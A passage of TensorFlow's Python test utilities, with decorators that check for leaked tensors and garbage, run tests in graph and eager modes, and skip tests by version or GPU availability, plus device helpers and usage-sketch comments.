f(self, *args, **kwargs)
# Some objects are newly created by _get_object_count_by_type(). So
# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
obj_count_by_type = _get_object_count_by_type()
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = _get_object_count_by_type() - obj_count_by_type
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
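# Example (editorial sketch):
#   _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
#   -> [OrderedDict([("mode", "graph"), ("use_gpu", True)]),
#       OrderedDict([("mode", "eager"), ("use_gpu", True)])]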
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically check
the generated graph. Attempting to evaluate graph or function results via
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def eager_lazy_remote_copy_on_and_off(f):
"""Execute the test method w/o lazy tensor copy for function remote inputs."""
@parameterized.named_parameters([("WithLazyRemoteCopy", True), ("", False)])
@functools.wraps(f)
def decorator(self, lazily_remote_copy, *args, **kwargs):
if lazily_remote_copy:
context.context().lazy_remote_inputs_copy = True
else:
context.context().lazy_remote_inputs_copy = False
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None, this
      returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
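# `py_func_if_in_function` is what lets the assertion helpers defined on
# TensorFlowTestCase below run while a test body is being traced inside a
# tf.function: tensor arguments are routed through script_ops.py_func, so the
# Python-level comparison executes on concrete numpy values at graph run time
# rather than on symbolic tensors at trace time. A hypothetical sketch:
#
#   @def_function.function
#   def traced_body(x):
#     # Without the wrapper, asserting on the symbolic `x` during tracing
#     # would fail; wrapped, the check runs when the function is executed.
#     self.assertAllEqual([1, 2], x)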
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
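# A usage sketch for `also_run_as_tf_function` (hypothetical test body). Per
# the docstring above, the body must not create variables, since it is traced
# again when wrapped in a tf.function:
#
#   class TwoModesTest(test_util.TensorFlowTestCase):
#
#     @test_util.also_run_as_tf_function
#     def testStatelessOp(self):
#       x = constant_op.constant(3.0)
#       self.assertAllClose(9.0, x * x)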
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None, this
      returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
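# A usage sketch for `run_deprecated_v1` (hypothetical test method): the body
# executes under context.graph_mode(), so API calls build graph nodes that are
# evaluated explicitly through a session:
#
#   class LegacyGraphTest(test_util.TensorFlowTestCase):
#
#     @test_util.run_deprecated_v1
#     def testFeedsPlaceholder(self):
#       ph = array_ops.placeholder(dtypes.float32, shape=[2])
#       doubled = ph * 2.0
#       with self.cached_session() as sess:
#         self.assertAllEqual(
#             [2.0, 4.0], sess.run(doubled, feed_dict={ph: [1.0, 2.0]}))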
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None, this
      returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
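# A usage sketch for `run_v1_only` (hypothetical suite). Applied to a class it
# decorates setUp, so every test in the suite is skipped under v2; applied to
# a single method it skips just that case:
#
#   @test_util.run_v1_only("Exercises ref variables, which are v1-only.")
#   class RefVariableSuite(test_util.TensorFlowTestCase):
#
#     def testAssign(self):
#       ...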
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None, this
      returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None, this
      returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None, this
      returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
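# A usage sketch for `with_forward_compatibility_horizons` (hypothetical date
# and test): the body runs once per horizon, plus once with no horizon set
# because None is listed:
#
#   class CompatTest(test_util.TensorFlowTestCase):
#
#     @test_util.with_forward_compatibility_horizons(None, (2050, 1, 1))
#     def testNewOpPath(self):
#       ...  # exercises both the legacy and the post-horizon code path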
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
  Warning: if a non-GPU version of the package is installed, the function will
  also return False. Use `tf.test.is_built_with_cuda` to validate whether
  TensorFlow was built with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
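# A usage sketch for `is_gpu_available` (the capability value is illustrative;
# note the deprecation above in favor of
# tf.config.list_physical_devices('GPU')):
#
#   if test_util.is_gpu_available(cuda_only=True,
#                                 min_cuda_compute_capability=(7, 0)):
#     ...  # run the compute-capability-7.0-specific test path
#   else:
#     ...  # skip or fall back to a CPU-friendly variant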
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
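# A sketch of how the device helpers above compose (the ops are hypothetical):
# device(use_gpu=...) falls back to CPU when no GPU is present, while
# force_gpu()/force_cpu() pin ops unconditionally:
#
#   with device(use_gpu=True):  # GPU if available, else CPU
#     y = math_ops.matmul(a, b)
#   with force_cpu():  # always /device:CPU:0
#     z = math_ops.matmul(a, b)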
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
  Since the feed_dict is empty when not using placeholders, we should be able
  to call self.evaluate(); however, this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
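# A usage sketch for `disable_cudnn_autotune` (hypothetical test): useful when
# a test asserts that two graphs stay isomorphic, which autotuned algorithm
# selection could otherwise perturb:
#
#   class ConvGraphTest(test_util.TensorFlowTestCase):
#
#     @test_util.disable_cudnn_autotune
#     def testConvGraphsMatch(self):
#       ...  # build two conv graphs and assert they are isomorphic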
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
